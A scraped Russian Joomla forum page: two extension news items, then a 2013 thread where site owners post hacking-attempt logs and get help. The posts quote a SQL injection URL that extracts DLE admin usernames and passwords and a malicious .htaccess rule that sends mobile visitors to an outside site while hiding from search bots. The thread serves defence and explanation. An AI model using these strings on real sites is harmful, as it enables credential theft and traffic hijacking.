Новости Joomla

IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla

IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla

👩‍💻 IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla.Модуль «Виджет приложения ВКонтакте» для Joomla поможет добавить на сайт виджет с карточкой приложения или игры из социальной сети ВКонтакте.У вас возникла потребность отобразить информацию о ваших приложениях или играх на сайте с кнопкой перехода в социальную сеть, то этот модуль для Вас. Вам не придется хранить информацию о приложении у себя на сайте, все данные получаются через публичное API социальной сети ВКонтакте. Хранение информации на стороне ВКонтакте позволит Вам не нагружать базу данных сайта.В модуле имеется всего несколько опций и полей, которые максимально упрощают публикацию виджета. Первая опция позволяет подключить публичное API социальной сети ВКонтакте, необходимое для работы виджетов. Следующее поле потребует ввести идентификатор приложения или игры, присвоенный в социальной сети ВКонтакте. Следующая опция позволит выбрать вид отображаемой информации в виджете.Модуль имеет 3 варианта отображения:- карточка- участники- кнопкаПоддерживаемые версии Joomla: Joomla 3, Joomla 4, Joomla 5.Страница расширенияJoomla Extensions Directory#joomla #расширения #vk

SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla

SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla

👩‍💻 SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla.Компонент - менеджер цифровых проектов для Joomla! CMS. Компонент обеспечивает создание каталога цифровых проектов и предоставляет возможность скачивания, в том числе с использованием лицензионных ключей.👩‍💻 v.2.5.0. Что нового?Схемы структур данных для серверов обновлений. Теперь с SW JProjects вы может создавать сервер обновлений не только для расширений Joomla, но и свои собственные. Например, вам нужно, чтобы структура данных сервера обновлений была другая и формат должен быть, например, не XML, а JSON. Формирование структуры данных для сервера обновлений расширений Joomla вынесено в отдельный плагин. Вы можете создать свой собственный плагин и реализовать в нём нужную вам структуру данных, добавив или наоборот исключив отображаемые данные. Сервер обновлений в компоненте по-прежнему отображает информацию о списке проектов и их версиях, о конкретном проекте и его changelog.Можно выбрать схему данных сервера обновлений глобально для всего компонента, выбрать другую схему данных для категории проектов, а так же выбрать схему в каждом проекте.

Разработчикам в качестве образца можно посмотреть плагин схемы данных для Joomla в составе компонента или же плагин-образец JSON-схемы на GitHub.
Группа плагинов swjprojects. Для нужд компонента создана группа плагинов swjprojects. В частности, в этой группе находится плагин структуры данных Joomla расширений для сервера обновлений.Изменение языковых констант. Изменены некоторые языковые константы в панели администратора. Если вы делали переопределение констант - переопределите их снова.👩‍💻 Joomla 6. Внесены изменения для корректной установки и работы компонента на Joomla 6. Компонент успешно протестирован на Joomla 6-beta2.Минимальная версия Joomla - 5. Подняты минимальные системные требования: Joomla 5.0.0 и PHP 8.1.- Страница расширения👉 Плагин-образец кастомной JSON-схемы данных для сервера обновлений на GitHub.- GitHub расширения- Документация на GitHub- Joomla Extensions Directory#joomla #расширения

Обновление Nevigen Audit v.1.3.2 для JoomShopping 5

1 ... 7 8 9 10 11 ... 23   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 263277 Просмотров
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #240 : 19.06.2013, 19:49:35 »
Цитата: rosalin от 13.05.2013, 12:33:26
Ребята что это?
Спойлер
[свернуть]
Первые две строчки, это пытаются реализовать локальный инклуд
Третья строчка, говорит, что у вас пытаются (если таков установлен) JCE Залиться, а конкретно в строчке реализуется переименнования уже залитого файла с gif в php!
Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #241 : 23.06.2013, 20:52:55 »
Спойлер
[свернуть]
Записан
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #242 : 23.06.2013, 22:54:57 »
Цитировать
...from dle_users...

Не просто blind-инъекция, а супер-слепая, без проверки движка. Если я правильно тут понимаю что пытаются ломать DLE на джумловском сайте
Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #243 : 23.06.2013, 23:02:24 »
Хз.. но префикс там точно другой. Долбятся боты.
Записан
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #244 : 25.06.2013, 05:11:05 »
Цитата: SDKiller от 23.06.2013, 22:54:57
Не просто blind-инъекция, а супер-слепая, без проверки движка.
По-моему их таких 90%. У меня старательно доблятся в WordPress, который никогда не стоял.
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #245 : 25.06.2013, 06:51:20 »
Аналогичный запрос с этого же IP - 94.228.220.68
Спойлер
[свернуть]
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #246 : 25.06.2013, 11:26:43 »
не стоит на ботов внимание обращать, мало кто из них интеллектуален к нашей же радости
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #247 : 27.06.2013, 15:19:48 »
что за хрень:
Line 1381: 83.221.219.152 - - [27/Jun/2013:11:37:33 +0400] "OPTIONS /attachments/article/737/ HTTP/1.0" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
Line 1382: 83.221.219.152 - - [27/Jun/2013:11:37:33 +0400] "PROPFIND /attachments/article/737 HTTP/1.0" 301 255 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
Line 1383: 83.221.219.152 - - [27/Jun/2013:11:37:33 +0400] "PROPFIND /attachments/article/737/ HTTP/1.0" 405 260 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601
особенно последние две строки ! по сути они идентичны, а сервак реагирует по-разному!
Записан
*

autosandul

  • Новичок
  • 3
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #248 : 27.06.2013, 15:37:42 »
Admin Tools сообщил о нарушении безопасности:

Адрес IP: 94.228.220.68 (IP Lookup: http://ip-lookup.net/index.php?ip=94.228.220.68)
Причина: SQLi Shield

http://сайт/index.php?do=form&id=1+and+1=0+union+select+1,2,3,4,5,6,7,8,9,group_concat(0x3a,0x3c6b65793e,0x3a,name,0x3a,password,0x3c6b6579733e),11+from+dle_users+where+user_group=1+--++--+


Что это и как с этим бороться? Спасибо.
Записан
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #249 : 27.06.2013, 16:00:14 »
Никак если у вас Joomla - вам конкретно такой запрос ничем не угрожает, так как очевидно направлен на какую-то уязвимость в DLE.
Можете IP забанить.
Записан
*

Андрюхин

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #250 : 28.06.2013, 00:31:19 »
Перенес готовый, не мною настроенный изначально сайт к себе на хостинг. Через 2 месяца приходит от хостера письмо, что из вэб почты моего аккаунта 790 писем ушло. и ссылка.. по ней вижу вот такой вот текст:

Спойлер
[свернуть]

как я понял текст, есть некая дырка в плагине этом, и через неё как-то пробрался червяк, и смог отправить письма через мой вебмейл.
VirtueMart хоть и установлен, но используется как каталог. т.е. функционала магазина в нем нет.
вопрос - если я просто снесу к чертям всю папку с плагином это поможет решить вопрос со спамом?
как отключить плагин этот - кларна - не нашел в настройках VirtueMart.

за 3 дня второе письмо с 790 письмами спама через эту дырку.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #251 : 28.06.2013, 09:51:00 »
а не думаете что к вам просто в папку скрипт для рассылки положили, ну или изначально варьез сами поставили
Цитировать
вопрос - если я просто снесу к чертям всю папку с плагином это поможет решить вопрос со спамом?
снесите весь сайт уж тогда  ;D - это одним махом решит все проблемы/головные боли и не только с рассылкой
Записан
*

Андрюхин

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #252 : 28.06.2013, 21:23:51 »
Цитата: flyingspook от 28.06.2013, 09:51:00
а не думаете что к вам просто в папку скрипт для рассылки положили, ну или изначально варьез сами поставилиснесите весь сайт уж тогда  ;D - это одним махом решит все проблемы/головные боли и не только с рассылкой

удаление папки как и ожидалось не решило проблему. буквально через пол часа новый отчет об очередных 790 письмах. в папке входящие (сами письма как будто отчет о недоставленном письме, но при этом в исходящих ничего нет) уже 26к скопилось за несколько дней. теперь путь, на котороый ругается отчет это "/".

Не знаю что делать, поменял пароли все, посмотрю что будет дальше. если снова будет такое же, буду писать в саппорт хостеру
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #253 : 28.06.2013, 22:52:28 »
вот топик
http://joomlaforum.ru/index.php/topic,268015.msg1341591.html#msg1341591
почитайте
ни как не соберусь со временем про логирование все собрать и описать как просматривать и искать
Записан
*

ArtTeam

  • Захожу иногда
  • 186
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #254 : 29.06.2013, 07:36:53 »
подскажите что это ?
Спойлер
[свернуть]
Записан
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #255 : 29.06.2013, 07:40:58 »
Кто сталкивался с таким в файле .htaccess?
RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    http://base-file.com/files/soft/    [L,R=302]
Записан
Мелкий ремонт. skype poisk-plus
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #256 : 29.06.2013, 08:18:00 »
Цитата: aspidy от 29.06.2013, 07:40:58
Кто сталкивался с таким в файле .htaccess?
Редирект, скрытый от поисковиков, на "левый" сайт.

Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #257 : 29.06.2013, 10:13:58 »
Спойлер
[свернуть]
Записан
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #258 : 29.06.2013, 14:26:41 »
Цитировать
Редирект, скрытый от поисковиков, на "левый" сайт.
Это понятно, но какой смысл редиректить только мобильники? Подгруздка вирусов на взлом?
Записан
Мелкий ремонт. skype poisk-plus
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #259 : 29.06.2013, 18:12:11 »
Цитировать
но какой смысл редиректить только мобильники?
каждый взлом это своя цель, у этих SMS трафик и перевод в финансы
сейчас сайт чистили там 4 разных "взломщиков" сидели по почерку видно(хотя может и один но целей много), и у каждого свои приоритеты, от безобидных ссылок с бирж и до фишинга, каждый свое ставит
Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #260 : 01.07.2013, 21:40:04 »
Спойлер
[свернуть]

Спойлер
[свернуть]
Записан
*

RomanA

  • Захожу иногда
  • 111
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #261 : 03.07.2013, 10:31:14 »
На днях в сайте попорчены _все_ JS добавкой в начала текста:
Спойлер
[свернуть]
В логе от "jhackguard" в числе прочего следующий текст:
Спойлер
[свернуть]
Первая раскодировка дала:
Спойлер
[свернуть]
После второй раскодировки:
Спойлер
[свернуть]

И ещё полно записей типа
Спойлер
[свернуть]
И ещё вот эта подмена файла:
Спойлер
[свернуть]
, но таких файлов нигде не найдено.

Что бы это значило?
« Последнее редактирование: 03.07.2013, 10:41:32 от RomanA »
Записан
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #262 : 03.07.2013, 10:37:55 »
Ну для начала - что толку особо от jhackguard нет раз файлы всё равно были модифицированы )
Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #263 : 03.07.2013, 10:41:20 »
Подгружают вам всякую гадость. Искать надо и чистить.
Записан
*

RomanA

  • Захожу иногда
  • 111
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #264 : 03.07.2013, 10:42:22 »
Да почистил-то сразу, а вот как предотвратить дальнейшее?..
Как-то найти бы дыру, в каких логах посмотреть...
J 1.5.22, обновить пока нет возможности.
Записан
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #265 : 03.07.2013, 11:40:55 »
Хотя бы до 1.5.26 обновите
Там как раз последние несколько релизов были в основном для устранения уязвимостей.
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #266 : 03.07.2013, 11:53:29 »
RomanA
Проверь и обнови расширения JCE and nnramework
Записан
*

RomanA

  • Захожу иногда
  • 111
  • 0 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #267 : 03.07.2013, 13:15:25 »
Спасибо, попробую и то и другое.
Записан
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #268 : 03.07.2013, 13:26:23 »
Цитата: RomanA от 03.07.2013, 10:42:22
J 1.5.22, обновить пока нет возможности.
сочувствую)))
Записан
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

radiant

  • Захожу иногда
  • 114
  • 3 / 0
Re: Логи попыток взлома выкладывать сюда. Инструкция тоже тут + расширения форумчан для лечения
« Ответ #269 : 06.07.2013, 19:58:54 »
Начали
« Последнее редактирование: 08.02.2021, 23:04:23 от radiant »
Записан
1 ... 7 8 9 10 11 ... 23   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 2656 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 3026 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 2406 		Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

 Ответов: 0
Просмотров: 886 		Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

 Ответов: 11
Просмотров: 2125 		Последний ответ 03.11.2020, 17:36:03
от Cedars